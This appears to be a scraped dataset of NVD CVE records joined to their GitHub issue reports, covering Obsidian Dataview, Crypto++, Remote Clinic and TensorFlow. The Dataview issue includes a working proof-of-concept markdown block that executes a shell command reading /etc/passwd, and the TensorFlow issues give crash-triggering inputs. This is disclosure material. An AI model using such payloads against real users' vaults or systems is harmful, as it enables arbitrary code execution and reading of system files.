"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/blacksmithgu/obsidian-dataview/issues/615"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/blacksmithgu/obsidian-dataview/issues/615"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:obsidian:obsidian_dataview:*:*:*:*:*:*:*:*",
"matchCriteriaId": "9CB8353D-A92C-4981-841F-1875BE26031F",
"versionEndExcluding": null,
"versionEndIncluding": "0.4.11",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:obsidian:obsidian_dataview:0.4.12:-:*:*:*:*:*:*",
"matchCriteriaId": "E3FF429D-09CE-4219-8650-480BB404CA7A",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:obsidian:obsidian_dataview:0.4.12:hotfix1:*:*:*:*:*:*",
"matchCriteriaId": "638D9E3E-A139-47BD-B3EF-D49865819FC0",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"94"
] | 94 | https://github.com/blacksmithgu/obsidian-dataview/issues/615 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"blacksmithgu",
"obsidian-dataview"
] | ## Describe the bug
I discovered a way to craft malicious markdown files that will cause the obsidian-dataview plugin to execute arbitrary commands on users’ systems. This is due to the unsafe use of eval within the [evalInContext](https://github.com/blacksmithgu/obsidian-dataview/blob/f897a178a678c2fa625de018c6722488e237a5b4/src/api/inline-api.ts#L306) function located in src/api/inline-api.ts.
This has been assigned a CVE of [CVE-2021-42057](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-42057) for tracking.
## To Reproduce
The following proof-of-concept can be used to display a file on a user’s system by executing the `cat` command:
````
```dataviewjs
require("child_process").exec("cat /etc/passwd",(_0,stdout,_1) => dv.span(stdout));""
```
````
A malicious user could leverage this vulnerability to execute arbitrary code on other users' systems by getting them to open an untrusted markdown file. This is especially dangerous in environments where users share vaults.
## Expected behavior
DataviewJS should not make an unsafe call to eval using user supplied input.
## Additional Context
Shortly after we privately disclosed this issue, @blacksmithgu promptly changed the default behavior of Dataview to no longer enable JavaScript Queries by default (see release [0.4.13](https://github.com/blacksmithgu/obsidian-dataview/releases/tag/0.4.13)). This helps protect new dataview users and provides a way for existing dataview users to mitigate this issue by disabling the JavaScript Query functionality when opening untrusted markdown.
@blacksmithgu is currently working on additional solutions and provided permission for us to open a public issue here for tracking. | Arbitrary Code Execution via JavaScript Queries (CVE-2021-42057) | https://api.github.com/repos/blacksmithgu/obsidian-dataview/issues/615/comments | 17 | 2021-11-04T19:08:34Z | 2022-09-30T23:17:56Z | https://github.com/blacksmithgu/obsidian-dataview/issues/615 | 1,045,109,271 | 615 | 2,757 |
CVE-2021-43398 | 2021-11-04T21:15:09.520 | Crypto++ (aka Cryptopp) 8.6.0 and earlier contains a timing leakage in MakePublicKey(). There is a clear correlation between execution time and private key length, which may cause disclosure of the length information of the private key. This might allow attackers to conduct timing attacks. NOTE: this report is disputed by the vendor and multiple third parties. The execution-time differences are intentional. A user may make a choice of a longer key as a tradeoff between strength and performance. In making this choice, the amount of information leaked to an adversary is of infinitesimal value | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://cryptopp.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/weidai11/cryptopp/issues/1080"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weidai11/cryptopp/issues/1080#issuecomment-996492222"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://cryptopp.com"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/weidai11/cryptopp/issues/1080"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weidai11/cryptopp/issues/1080#issuecomment-996492222"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cryptopp:crypto\\+\\+:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38083732-7F2F-45F1-B773-8BD7A039F08B",
"versionEndExcluding": null,
"versionEndIncluding": "8.6.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"203"
] | 203 | https://github.com/weidai11/cryptopp/issues/1080 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"weidai11",
"cryptopp"
] | I'm using Crypto++ built by the latest version of source code in this repository on Ubuntu 18.04.
The function is as follows:
```c++
void ECC_PrivatetoPublic(string priv){
using namespace CryptoPP;
clock_t start, finish;
ECDSA<ECP, SHA256>::PrivateKey privateKey;
ECDSA<ECP, SHA256>::PublicKey publicKey;
const Integer privStr(priv.c_str());
const DL_GroupParameters_EC<ECP>& curve = ASN1::secp521r1();
privateKey.Initialize(curve, privStr);
privateKey.MakePublicKey(publicKey);
std::string x = IntToString<>(publicKey.GetPublicElement().x, 10);
std::string y = IntToString<>(publicKey.GetPublicElement().y, 10);
printf("%s\n%s\n", x.c_str(), y.c_str());
return;
}
```
It seems that the execution time of `privateKey.MakePublicKey(publicKey)` is positively correlated with the length of the private key instead of a constant value. I did a simple experiment and heres the result. But I haven't studied the reason yet.

I suppose this may leak the length information of the input private key and facilitate malicious attacks on key decryption.
Besides, the execution time becomes abnormally long when the private key reaches hundreds of bytes long, which causes a little inconvenience to me.
Hope you can check this case. | Correlation Between Key Length and Execution Time | https://api.github.com/repos/weidai11/cryptopp/issues/1080/comments | 14 | 2021-10-28T08:39:07Z | 2022-08-17T12:24:58Z | https://github.com/weidai11/cryptopp/issues/1080 | 1,038,244,979 | 1,080 | 2,758 |
CVE-2021-43398 | 2021-11-04T21:15:09.520 | Crypto++ (aka Cryptopp) 8.6.0 and earlier contains a timing leakage in MakePublicKey(). There is a clear correlation between execution time and private key length, which may cause disclosure of the length information of the private key. This might allow attackers to conduct timing attacks. NOTE: this report is disputed by the vendor and multiple third parties. The execution-time differences are intentional. A user may make a choice of a longer key as a tradeoff between strength and performance. In making this choice, the amount of information leaked to an adversary is of infinitesimal value | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 5,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "NONE",
"vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N",
"version": "2.0"
},
"exploitabilityScore": 10,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 1.4,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://cryptopp.com"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/weidai11/cryptopp/issues/1080"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weidai11/cryptopp/issues/1080#issuecomment-996492222"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://cryptopp.com"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/weidai11/cryptopp/issues/1080"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/weidai11/cryptopp/issues/1080#issuecomment-996492222"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:cryptopp:crypto\\+\\+:*:*:*:*:*:*:*:*",
"matchCriteriaId": "38083732-7F2F-45F1-B773-8BD7A039F08B",
"versionEndExcluding": null,
"versionEndIncluding": "8.6.0",
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"203"
] | 203 | https://github.com/weidai11/cryptopp/issues/1080#issuecomment-996492222 | [
"Exploit",
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"weidai11",
"cryptopp"
] | I'm using Crypto++ built by the latest version of source code in this repository on Ubuntu 18.04.
The function is as follows:
```c++
void ECC_PrivatetoPublic(string priv){
using namespace CryptoPP;
clock_t start, finish;
ECDSA<ECP, SHA256>::PrivateKey privateKey;
ECDSA<ECP, SHA256>::PublicKey publicKey;
const Integer privStr(priv.c_str());
const DL_GroupParameters_EC<ECP>& curve = ASN1::secp521r1();
privateKey.Initialize(curve, privStr);
privateKey.MakePublicKey(publicKey);
std::string x = IntToString<>(publicKey.GetPublicElement().x, 10);
std::string y = IntToString<>(publicKey.GetPublicElement().y, 10);
printf("%s\n%s\n", x.c_str(), y.c_str());
return;
}
```
It seems that the execution time of `privateKey.MakePublicKey(publicKey)` is positively correlated with the length of the private key instead of a constant value. I did a simple experiment and heres the result. But I haven't studied the reason yet.

I suppose this may leak the length information of the input private key and facilitate malicious attacks on key decryption.
Besides, the execution time becomes abnormally long when the private key reaches hundreds of bytes long, which causes a little inconvenience to me.
Hope you can check this case. | Correlation Between Key Length and Execution Time | https://api.github.com/repos/weidai11/cryptopp/issues/1080/comments | 14 | 2021-10-28T08:39:07Z | 2022-08-17T12:24:58Z | https://github.com/weidai11/cryptopp/issues/1080 | 1,038,244,979 | 1,080 | 2,759 |
CVE-2021-39416 | 2021-11-05T16:15:07.710 | Multiple Cross Site Scripting (XSS) vulnerabilities exists in Remote Clinic v2.0 in (1) patients/register-patient.php via the (a) Contact, (b) Email, (c) Weight, (d) Profession, (e) ref_contact, (f) address, (g) gender, (h) age, and (i) serial parameters; in (2) patients/edit-patient.php via the (a) Contact, (b) Email, (c) Weight, Profession, (d) ref_contact, (e) address, (f) serial, (g) age, and (h) gender parameters; in (3) staff/edit-my-profile.php via the (a) Title, (b) First Name, (c) Last Name, (d) Skype, and (e) Address parameters; and in (4) clinics/settings.php via the (a) portal_name, (b) guardian_short_name, (c) guardian_name, (d) opening_time, (e) closing_time, (f) access_level_5, (g) access_level_4, (h) access_level_ 3, (i) access_level_2, (j) access_level_1, (k) currency, (l) mobile_number, (m) address, (n) patient_contact, (o) patient_address, and (p) patient_email parameters. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"integrityImpact": "PARTIAL",
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": true
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "cve@mitre.org",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/remoteclinic/RemoteClinic/issues/17"
},
{
"source": "cve@mitre.org",
"tags": [
"Product",
"Vendor Advisory"
],
"url": "https://remoteclinic.io"
},
{
"source": "cve@mitre.org",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://sisl.lab.uic.edu/projects/chess/remote-clinic/"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Issue Tracking",
"Third Party Advisory"
],
"url": "https://github.com/remoteclinic/RemoteClinic/issues/17"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Product",
"Vendor Advisory"
],
"url": "https://remoteclinic.io"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://sisl.lab.uic.edu/projects/chess/remote-clinic/"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:remoteclinic:remote_clinic:2.0:*:*:*:*:*:*:*",
"matchCriteriaId": "E545F721-A065-4091-8405-9B92071E1A44",
"versionEndExcluding": null,
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"79"
] | 79 | https://github.com/remoteclinic/RemoteClinic/issues/17 | [
"Issue Tracking",
"Third Party Advisory"
] | github.com | [
"remoteclinic",
"RemoteClinic"
] | In Remote Clinic v2.0, there are multiple Cross-Site Scripting vulnerabilities via the Contact, Email, Weight, Profession, ref_contact, and address parameters in /patients/register-patient.php are vulnerable due to the _POSTs not being sanitized properly for XSS despite being sent through the friendly function.
In Remote Clinic v2.0, there is Stored Cross-Site Scripting and no sanitization for the gender, age, serial parameters when retrieved by _POST in /patients/register-patient.php to be sent to the database. This is possible by changing the values in the dropdowns in the inspect menu.
In Remote Clinic v2.0, in patients/edit-patient.php, the Contact, Email, Weight, Profession, ref_contact, and address parameters being edited are not sanitized for Cross-Site Scripting when they are retrieved by _POST.
In Remote CLinic v2.0, in patients/edit-patient.php, the serial, age, and gender dropdowns are able to be changed via the inspect menu
In Remote Clinic v2.0, in staff/edit-my-profile.php, the Title, First Name, Last Name, Skype, and Address parameters sent by _POST to be put in the database, is unsanitized and prone to Cross-Site Scripting (XSS)
In Remote Clinic v2.0, in clinics/settings.php, most of the parameters being passed into the database are sanitized insufficiently. The parameters that allow Cross-Site Scripting are portal_name, guardian_short_name, guardian_name, opening_time, closing_time, access_level_5, access_level_4,access_level_ 3, access_level_2, access_level_1, currency, mobile_number, address, patient_contact, patient_address, and patient_email.
| Multiple Cross Site Scripting Vulnerabilities in Remote Clinic V2.0 | https://api.github.com/repos/remoteclinic/RemoteClinic/issues/17/comments | 2 | 2021-08-16T11:38:23Z | 2022-03-04T13:49:45Z | https://github.com/remoteclinic/RemoteClinic/issues/17 | 971,647,775 | 17 | 2,760 |
CVE-2021-41195 | 2021-11-05T20:15:07.707 | TensorFlow is an open source platform for machine learning. In affected versions the implementation of `tf.math.segment_*` operations results in a `CHECK`-fail related abort (and denial of service) if a segment id in `segment_ids` is large. This is similar to CVE-2021-29584 (and similar other reported vulnerabilities in TensorFlow, localized to specific APIs): the implementation (both on CPU and GPU) computes the output shape using `AddDim`. However, if the number of elements in the tensor overflows an `int64_t` value, `AddDim` results in a `CHECK` failure which provokes a `std::abort`. Instead, code should use `AddDimWithStatus`. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/e9c81c1e1a9cd8dd31f4e83676cab61b60658429"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46888"
},
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/pull/51733"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cq76-mxrc-vchh"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/e9c81c1e1a9cd8dd31f4e83676cab61b60658429"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/46888"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/pull/51733"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-cq76-mxrc-vchh"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910",
"versionEndExcluding": "2.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D68D8D1-DB27-4395-9D3D-2BED901B852C",
"versionEndExcluding": "2.6.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"190"
] | 190 | https://github.com/tensorflow/tensorflow/issues/46888 | [
"Patch",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): No
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: N/A
- TensorFlow installed from (source or binary): binary
- TensorFlow version (use command below):2.1.0
- Python version:3.7.6
- Bazel version (if compiling from source):N/A
- GCC/Compiler version (if compiling from source):N/A
- CUDA/cuDNN version:N/A
- GPU model and memory:N/A
**Describe the current behavior**
tf.math.segment_max/min/mean/sun/prod crashes(aborts) when `segment_ids` is large
**Describe the expected behavior**
expect an exception message if the input is unexpected instead of crash
**Standalone code to reproduce the issue**
~~~python
tf.math.segment_max(data=np.ones((1,10,1)), segment_ids=[1676240524292489355])
tf.math.segment_min(data=np.ones((1,10,1)), segment_ids=[1676240524292489355])
tf.math.segment_mean(data=np.ones((1,10,1)), segment_ids=[1676240524292489355])
tf.math.segment_sum(data=np.ones((1,10,1)), segment_ids=[1676240524292489355])
tf.math.segment_prod(data=np.ones((1,10,1)), segment_ids=[1676240524292489355])
~~~
Output:
~~~python
2021-02-03 16:44:25.849065: F tensorflow/core/framework/tensor_shape.cc:405] Check failed: 0 <= new_num_elements (0 vs. -1684338830784658056)
Aborted (core dumped)
~~~
Related issue: #46696 | tf.math.segment_max/min/mean/sun/prod crashes(aborts) when segment_ids is large | https://api.github.com/repos/tensorflow/tensorflow/issues/46888/comments | 4 | 2021-02-03T16:47:27Z | 2021-10-28T00:38:23Z | https://github.com/tensorflow/tensorflow/issues/46888 | 800,507,514 | 46,888 | 2,761 |
CVE-2021-41196 | 2021-11-05T20:15:07.780 | TensorFlow is an open source platform for machine learning. In affected versions the Keras pooling layers can trigger a segfault if the size of the pool is 0 or if a dimension is negative. This is due to the TensorFlow's implementation of pooling operations where the values in the sliding window are not checked to be strictly positive. The fix will be included in TensorFlow 2.7.0. We will also cherrypick this commit on TensorFlow 2.6.1, TensorFlow 2.5.2, and TensorFlow 2.4.4, as these are also affected and still in supported range. | {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "LOW",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 2.1,
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"vectorString": "AV:L/AC:L/Au:N/C:N/I:N/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 2.9,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": null,
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
},
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 1.8,
"impactScore": 3.6,
"source": "nvd@nist.gov",
"type": "Primary"
}
],
"cvssMetricV40": null
} | [
{
"source": "security-advisories@github.com",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/12b1ff82b3f26ff8de17e58703231d5a02ef1b8b"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/51936"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-m539-j985-hcr8"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/commit/12b1ff82b3f26ff8de17e58703231d5a02ef1b8b"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/issues/51936"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Third Party Advisory"
],
"url": "https://github.com/tensorflow/tensorflow/security/advisories/GHSA-m539-j985-hcr8"
}
] | [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "455FB550-4C9C-4BD6-9F76-A627B62AB332",
"versionEndExcluding": "2.4.4",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": null,
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "035CDF63-1548-4FB4-B8A9-B8D328FAF910",
"versionEndExcluding": "2.5.2",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.5.0",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:google:tensorflow:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D68D8D1-DB27-4395-9D3D-2BED901B852C",
"versionEndExcluding": "2.6.1",
"versionEndIncluding": null,
"versionStartExcluding": null,
"versionStartIncluding": "2.6.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
],
"operator": null
}
] | [
"191"
] | 191 | https://github.com/tensorflow/tensorflow/issues/51936 | [
"Exploit",
"Third Party Advisory"
] | github.com | [
"tensorflow",
"tensorflow"
] | **System information**
- Have I written custom code (as opposed to using a stock example script provided in TensorFlow): yes
- OS Platform and Distribution (e.g., Linux Ubuntu 16.04): Linux Ubuntu 18.04
- Mobile device (e.g. iPhone 8, Pixel 2, Samsung Galaxy) if the issue happens on mobile device: n/a
- TensorFlow installed from (source or binary): binary
- TensorFlow version (use command below): 2.6.0
- Python version: 3.6.8
- Bazel version (if compiling from source): n/a
- GCC/Compiler version (if compiling from source): n/a
- CUDA/cuDNN version: n/a
- GPU model and memory: n/a
**Describe the current behavior**
`tf.keras.layers.MaxPooling3D` crashes when `pool_size` contains `0`, and outputs a all-inf tensor when `pool_size` contains negative values.
**Describe the expected behavior**
